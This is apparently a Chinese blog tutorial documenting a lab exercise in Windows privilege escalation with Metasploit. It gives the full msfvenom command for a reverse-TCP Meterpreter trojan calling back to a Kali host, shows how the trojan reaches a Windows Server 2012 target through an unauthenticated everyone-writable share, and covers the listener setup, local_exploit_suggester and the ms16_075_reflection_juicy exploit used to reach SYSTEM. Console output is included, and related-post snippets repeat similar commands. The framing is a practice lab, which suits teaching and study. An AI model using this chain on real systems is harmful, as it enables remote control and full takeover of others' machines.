Windows溢出提权 [msf全自动提权练习]

最新推荐文章于 2026-04-14 11:15:40 发布
原创 最新推荐文章于 2026-04-14 11:15:40 发布 · 844 阅读 · 3 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#windows #安全
文章描述了一种在Windows2012靶机上进行提权的方法,通过Kali生成反弹木马,利用Windows10作为中转,通过文件共享将木马传至靶机。在靶机上运行木马后,使用Metasploit进行监听和交互,接着运用local_exploit_suggester模块检测并尝试提权。

环境

Windows2012目标机(靶机),kali攻击机,Windows10(作为一个中转的机器,重点是前两个)

Windows2012

(由于该虚拟机无法安装vmtools,无法与真实机交互文件,所以我在本机win10上开启了一个共享文件,使他们可以交互文件方便后续操作。
正常的流程应该是2012上有一个web服务,通过getshell之后传递木马并运行上线msf)
image.png

kali生成exe木马

Windows msf.exe反弹木马,反弹地址为kali地址,反弹端口4444

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.54 LPORT=4444 -f exe -o msf.exe

然后把该木马拖到真实机的共享文件夹里

木马上传

由于真实机与靶机无法交互,所以换一种思路,两台机器在同一网段下,真实机开启文件共享服务,利用文件共享服务把木马传至靶机。

选择一个文件夹,作为共享文件夹

image.png

右键属性-》共享-》选择everyone添加

image.png
image.png

给予完全控制权限

也是为了防止后续出现其他的问题
image.png

回到共享栏-》选择网络和共享中心

这里是为了关闭身份验证,不然他会需要账户密码
image.png
image.png

靶机访问-》拖木马

路径长是因为我木马放在了共享文件夹的下一级目录里(问题不大),然后就可以拖出来了
image.png
image.png

kali监听

输入 :msfconsole
选择监听模块 :use exploit/multi/handler
设置payload:set payload windows/meterpreter/reverse_tcp
(该payload,应该与生成木马时的payload一样)
查看还需要设置什么:options
设置一个lhost地址:set lhost 192.168.10.54
(监听地址,也是木马生成时的反弹地址(kali本机))
设置端口:与木马反弹的端口一致(这里我默认就是4444,所以不用改)
开启监听:run

┌──(root㉿kali)-[/home/kali]
└─# msfconsole                  
                                                  

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v6.3.19-dev                          ]
+ -- --=[ 2318 exploits - 1215 auxiliary - 412 post       ]
+ -- --=[ 1234 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable verbose logging with set VERBOSE 
true                                                              
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/met
set payload windows/meterpreter/bind_hidden_ipknock_tcp
set payload windows/meterpreter/bind_hidden_tcp
set payload windows/meterpreter/bind_ipv6_tcp
set payload windows/meterpreter/bind_ipv6_tcp_uuid
set payload windows/meterpreter/bind_named_pipe
set payload windows/meterpreter/bind_nonx_tcp
set payload windows/meterpreter/bind_tcp
set payload windows/meterpreter/bind_tcp_rc4
set payload windows/meterpreter/bind_tcp_uuid
set payload windows/meterpreter/reverse_hop_http
set payload windows/meterpreter/reverse_http
set payload windows/meterpreter/reverse_http_proxy_pstore
set payload windows/meterpreter/reverse_https
set payload windows/meterpreter/reverse_https_proxy
set payload windows/meterpreter/reverse_ipv6_tcp
set payload windows/meterpreter/reverse_named_pipe
set payload windows/meterpreter/reverse_nonx_tcp
set payload windows/meterpreter/reverse_ord_tcp
set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp_allports
set payload windows/meterpreter/reverse_tcp_dns
set payload windows/meterpreter/reverse_tcp_rc4
set payload windows/meterpreter/reverse_tcp_rc4_dns
set payload windows/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted
                                        : '', seh, thread, proce
                                        ss, none)
   LHOST                      yes       The listen address (an i
                                        nterface may be specifie
                                        d)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost 192.168.10.54
lhost => 192.168.10.54
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.10.54:4444 
[*] Sending stage (175686 bytes) to 192.168.10.62
[*] Meterpreter session 1 opened (192.168.10.54:4444 -> 192.168.10.62:49196) at 2023-07-21 09:28:52 +0800

靶机运行木马-》msf上线

这里应该是webshell连上之后传入木马程序,然后命令运行。但是2012靶机上没有web服务所以我这里就直接在靶机上点击运行了(这样的权限是administrator,不用管,我们的目的是为了提升到system权限)
image.png

查看权限

image.png

保存该会话

bg
image.png

提权

切换为提权模块

use post/multi/recon/local_exploit_suggester

查看需要设置什么

options

设置一个session

set session 1

启动

run

命令过程

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > options 

Module options (post/multi/recon/local_exploit_suggester):

   Name           Current Settin  Required  Description
                  g
   ----           --------------  --------  -----------
   SESSION                        yes       The session to run t
                                            his module on
   SHOWDESCRIPTI  false           yes       Displays a detailed
   ON                                       description for the
                                            available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

然后他会自动检测有哪些可利用的漏洞,执行结束列出

yes代表可能存在该漏洞可利用,no代表没有
image.png

执行提取

选择一个模块:use exploit/windows/local/ms16_075_reflection_juicy
查看需要哪些设置:options
设置session:set session 1
启动:run

命令过程

msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms16_075_reflection  
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_075_reflection) > options 

Module options (exploit/windows/local/ms16_075_reflection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this m
                                       odule on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  none             yes       Exit technique (Accepted
                                        : '', seh, thread, proce
                                        ss, none)
   LHOST     192.168.10.54    yes       The listen address (an i
                                        nterface may be specifie
                                        d)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_075_reflection) > set session 1
session => 1
msf6 exploit(windows/local/ms16_075_reflection) > run

[*] Started reverse TCP handler on 192.168.10.54:4444 
[*] x64
[-] Exploit aborted due to failure: bad-config: Session/Target Arch mismatch; WOW64 not supported
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms16_075_reflection) > use exploit/windows/local/ms16_075_reflection_juicy
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
session => 1
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run

执行提权成功

image.png

默ran
关注
[升] Windows — 系统内核溢出漏洞
Blue17 の 小窝
01-29 1585
注意:很容易让电脑蓝屏,所以如果是测试的话,前最好做好系统备份。溢出漏洞就像是往杯子里装水 —— 如果水太多,被子装不下了,就会溢出来。计算机中有个地方叫作缓存区。程序缓存区的大小是事先设置好的,如果用户输入数据的大小超过了缓存区的大小,程序就会溢出。系统内核溢出漏洞是一种通用的方法,攻击者通常可以使用该方法绕过系统的所有安全限制。攻击者利用该漏洞的关键是目标系统没有及时安装补丁—— 即使微软已经针对某个漏洞发布了补丁,但如果系统没有立即安装补丁,就会让攻击者有机可乘。
[内网渗透]msfconsole
purvispanwu的博客
03-17 1462
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
利用MSF溢出漏洞windows server2012
qq_53409748的博客
03-29 2172
使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统
从键盘记录到:手把手教你用MSF完成Windows内网渗透全流程
最新发布
weixin_26875109的博客
04-14 405
本文详细介绍了如何利用Metasploit Framework(MSF)完成Windows内网渗透全流程,包括初始访问、信息收集、升、持久化控制和横向移动。特别关注了技术(如BypassUAC和本地漏洞利用)以及文件交互指令等关键操作,帮助安全研究人员构建完整的攻击链并规避防御检测。
升-Windows】-UACMSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务
xiaoheizi的博客
09-01 2876
1、具体有哪些限需要我们了解掌握的?后台限,网站限,数据库限,接口限,系统限,域控限等2、以上常见限获取方法简要归类说明?后台限:SQL注入数据库备份泄露,默认或弱口令等获取帐号密码进入网站限:后台升至网站限,RCE或文件操作类、反序列化等漏洞直达Shell数据库限:SQL注入数据库备份泄露,默认或弱口令等进入或网站限获取后转入接口限:SQL注入数据库备份泄露,源码泄漏,培植不当等或网站限获取后转入。
cve-2019-0708 msf 执行报错解决
大哥一声吼
12-03 1万+
cve-2019-0708 msf 执行报错解决 在检查服务器是否存在漏洞的过程中,发现exploit 报错, 报错信息如下,已经很明显了 Exploit aborted due to failure: bad-config: Set the most appropriate target manually ,没有正确设置好参数 msf5 exploit(windows/rdp/cve_2...
Windows学习笔记
m0_62466350的博客
07-28 1410
service_permissions模块会使用,两种方式获取system限,如果以管理员限运行,会尝试创建并运行一个新的服务,如果当前限不允许创建服务,会判断哪些服务的文件或文件夹的限有问题,并对其进行劫持,在劫持服务时会创建一个可执行程序,其文件名和安装路径都是随机的。如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,利用脚本,执行命令,但是不一定是系统限,还要看管理员开始安装sqlserver的限设置,一般情况是system限或者pulic,均能执行命令。
Windows升—溢出
剁椒鱼头没剁椒的博客
03-16 3735
这里需要我们了解的升大概分为:后台限,网站限,数据本限。接口限,系统限。域控限等。此方法是利用系统本身存在的一些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对比systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以升的exp。不过这里需要注意,只要对应的补丁号加上对应的系统的版本的exp才可以成功,有时候如果查找到exp不成功,那么就可以查看是不是系统版本没对应上,且不排除一些漏洞利用需要相应的环境。
windows总结
weixin_68652890的博客
04-05 5447
windows总结 文章目录溢出漏洞at&sc&ps命令数据库mysqlUDFMOF启动项sql serverxp_cmdshellsp_oacreate令牌窃取RottenPotato(烂土豆)配合令牌窃取DLL劫持不带引号的服务路径配合msf安全的服务限配合MSF其他方法 溢出漏洞 拿到服务器普通限→上传溢出程序→至administrator。 内核溢出漏洞总结:https://github.com/SecWiki/win
Windows系统内核溢出漏洞
qq_61553520的博客
05-29 2445
在内存空间中预留了一定的存储空间用来缓冲输入或输出的数据。通俗的讲,缓冲区就是当你打开应用程序或者文件的时候,系统会将数据从内存中复制一份到缓冲区,当再次打开时,系统直接从缓冲区读取,高打开的速度。
初学MSF之渗透、、免杀(上)
qq_53058639的博客
08-01 2567
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
使用MSF进行windows、linux、wesng使用
喜欢Python编程的程序员柚柚呀
02-29 1607
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
kali下msf
失心少年
09-23 4986
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler s...
使用MSF进行windows、linux、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows反弹shellEND推荐阅读MSF Linux反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows 靶机: Win server2003 + iis(已.
windows10系统下指定用户配置FTP服务器及多用户登录
LoFreedomAND的博客
07-27 1万+
Windows10平台下配置FTP服务,实现多用户登录
红队常用命令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-11 1万+
原文链接。
拿到GETSHELL之后的
weixin_69678131的博客
05-12 2253
getshell之后的
MSF渗透测试之msfvenom
lza20001103的博客
04-04 1366
MSF渗透测试之msfvenom
批量绑定linux主机双网卡,linux中配置双网卡的目的?如何实现双网卡绑定,以实现负载均衡?...
weixin_35045900的博客
05-01 491
bind0 IP 地址: 192.168.10.54先关闭两张网卡[root@uplooking ~]# ifdown ens33[root@uplooking ~]# ifdown ens38新建网卡配置文件[root@uplooking /etc/sysconfig/network-scripts]#vim ifcfg-bond0ifcfg-bond0 配置文件 ==========...
【内网安全】——Windows姿势
Demo不是emo的博客
02-06 6360
超详细的windows姿势汇总
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值